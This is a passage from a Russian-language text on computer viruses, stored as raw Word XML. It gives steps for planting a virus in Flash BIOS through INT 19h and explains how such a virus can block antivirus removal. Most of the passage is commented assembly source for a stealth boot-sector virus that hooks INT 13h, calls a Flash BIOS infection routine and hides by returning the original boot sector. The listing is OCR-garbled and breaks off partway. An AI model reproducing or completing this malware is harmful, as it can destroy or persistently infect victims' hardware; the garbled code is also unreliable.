        <w:t xml:space="preserve">дится в режиме "Readonly"); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Записать вирус в найденную область нулей; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Записать переход на вирус в точку входа INT 19h; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Восстановить режим "Readonly" для памяти Flash BIOS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Единственное предназначение INT 19h - быть вызванным в процессе</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>загрузки, чтобы загрузить boot-сектор в память и передать ему управле-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ние. Прерывание именно то, которое и требуется изменить. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Нужно иметь в виду, что одновременно читать из памяти Flash BIOS и</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>записывать в нее нельзя. Поэтому во время работы вируса нельзя ис-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>пользовать временные переменные в этой памяти. Более целесообразным</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>является создание вируса для обычного boot-сектора. Этот вирус следу-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ет поместить в конец памяти и оттуда устанавливать вектор INT 13h. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>AMI BIOS обладает своими специфическими особенностями при разме-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>щении в микросхемах Flash-памяти, которые базируются на использова-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>нии функции EOh прерывания INT 16h. Самое интересное состоит</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>в том, что однажды внесенный в эту память вирус может запретить по-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>вторно использовать указанную функцию. Это запретит антивирусным</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>программам воспользоваться ею в процессе удаления вируса из BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>компьютера. Исходя из этого, авторам антивирусных программ придет-</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">ся трассировать INT 16h, чтобы получить оригинальный вектор. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Исходный текст вируса, заражающего Flash BIOS.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Вирус, заражающий Flash BIOS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Если на компьютере есть Flash BIOS, имеется шанс, что его могут</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.серьезно испортить. Если BIOS изменится, это может привести</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;к неприятностям. Нельзя будет загрузиться даже с "чистой"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;дискеты. Зараженный чип в рабочее состояние не вернуть.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">огд О </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;При входе в boot-сектор 01=загрузочный диск</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov si,7COOh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Установим OOOOh в регистрах DS и ES</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>хог ах,ах</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov es.ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov ds.ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Установим значение стека OOOOh:7COOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">cli </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov ss.ax</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov sp.si</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">sti </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Уменьшим на 1Кбайт память (0040h:0013h)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">dec word ptr [0413h] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Получим размер памяти (при возврате в АХ)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">int 12h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Так как размер памяти указан в килобайтах (1024 байт), а нужно</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;в параграфах (16 байт), умножим его на 64, что эквивалентно</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;сдвигу на 6 разрядов влево </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov cl,6</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">shi ax.cl </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Установим новый сегмент вируса (вершина памяти)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov es,ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Перенесем вирусный сектор в вершину памяти</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>xor di,di</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov cx,200h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>eld</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">rep movsb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Сохраним вектор прерывания INT 13h. Поскольку этот вирус</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">[загрузился до загрузки DOS, то прерывание INT 21 h еще не </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">работает - работаем с вектором прерывания прямо в таблице </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax.word ptr [13h*4] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov word ptr es: [off set i13],ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax.word ptr [13h*4+2] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov word ptr es: [offset i 13+2],ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Установим новый вектор прерывания INT 13h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov word ptr [13h*4],offset Handler</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov word ptr [13h*4+2],es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Переходим в точку ES:Restart (в копии вируса,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[находящейся в вершине памяти)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">already_resident: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push es </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax,offset Restart </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">push ax </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">retf </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;C этого места программа работает уже в вершине памяти</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Restart: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Загружаем оригинальный boot-сектор из конца</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;root directory и передаем ему управление.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;Сброс дисковой подсистемы (перед работой</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;с дисковой подсистемой надо выполнить</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.функцию ООп прерывания INT 13h) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xor ах.ах </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">call int13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Подготовим регистры для загрузки оригинального boot-сектора </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">хог ах.ах </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov es,ax ;Сегмент для загрузки </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov bx,7COOh ;Смещение для загрузки </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov cx,0002h Дорожка 0, сектор 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">хог dh.dh ;Головка О </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax,0201h ;Функция 2, количество секторов 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Проверим диск, с которого грузимся. 80h и выше - жесткий диск, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;иначе - дискета. Копия оригинального boot-сектора хранится </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;в разных местах: на жестком диске - дорожка 0, головка 0, сектор 2; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;на дискете - дорожка 0, головка 1, сектор 14 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp dl,80h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jae MBR_Loader </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Грузимся с дискеты: изменим сектор и головку</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>mov с1,14 ;Сектор 14</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">mov dh,1 ;Головка 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3агрузим оригинальный boot-сектор по адресу OOOOh:7COOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">MBRJ-oader: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">call int13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Сохраним в стеке номер диска, с которого грузимся</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">push dx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Проверим, заражен ли Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>cmp byte ptr cs:flash_done,1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">je Flash_resident </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3аразим Flash BIOS</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call flash_BIOS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Восстановим из стека DX (номер загрузочного диска)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Flash_resident: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">pop dx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;3апускаем оригинальный boot-сектор (JMP FAR OOOOh:7COOh)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>db OEAh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>dw 7COOh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">dw 0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;Сюда попадаем, когда происходит чтение boot-сектора. Скрываем</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[Присутствие вируса методом чтения оригинального boot-сектора</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Stealth: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Остановим значения сектора, где хранится копия оригинального</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">iboot-сектора </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov cx,02h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov ax,0201h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Проверим, откуда считан boot-сектор (дискета или жесткий диск),</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;так как копии хранятся в разных местах </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp dl,80h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jae hd_stealth </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mov cl,14 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>mov dh,1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">hd_stealth: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Прочтем копию оригинального boot-сектора. Так как</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;номера секторов подменены, фактически "копия выдается</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>;за оригинал" - скрываем свое присутствие (Stealth).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">call int13h </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Выходим из обработчика прерывания</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">jmp pop_exit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">;Проверка наличия резидентного вируса - ответим: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>;запрос INT 13h (AX=ABBAh), ответ AX=BMBh</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">resJest: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">xchg ah,al </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">iret </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Обработчик прерывания INT 13h</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Handler: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>.Если при вызове в АХ находится ABBAh,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">.значит это проверка наличия резидентного вируса </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp ax.OABBAh </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">je resJest </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Перехватываем только функцию 02h (чтение сектора): проверяем</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;номер функции. Если не 2, запускаем оригинальный обработчик </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">cmp ah,2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">jne jend </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="002C1831">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>[Проверяем номера дорожки и сектора, интересуясь только теми</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>.секторами, в которых может оказаться вирус -</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">;дорожка 0, головка 0, сектор 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C190D" w:rsidRDefault="009C190D">
      <w:pPr>
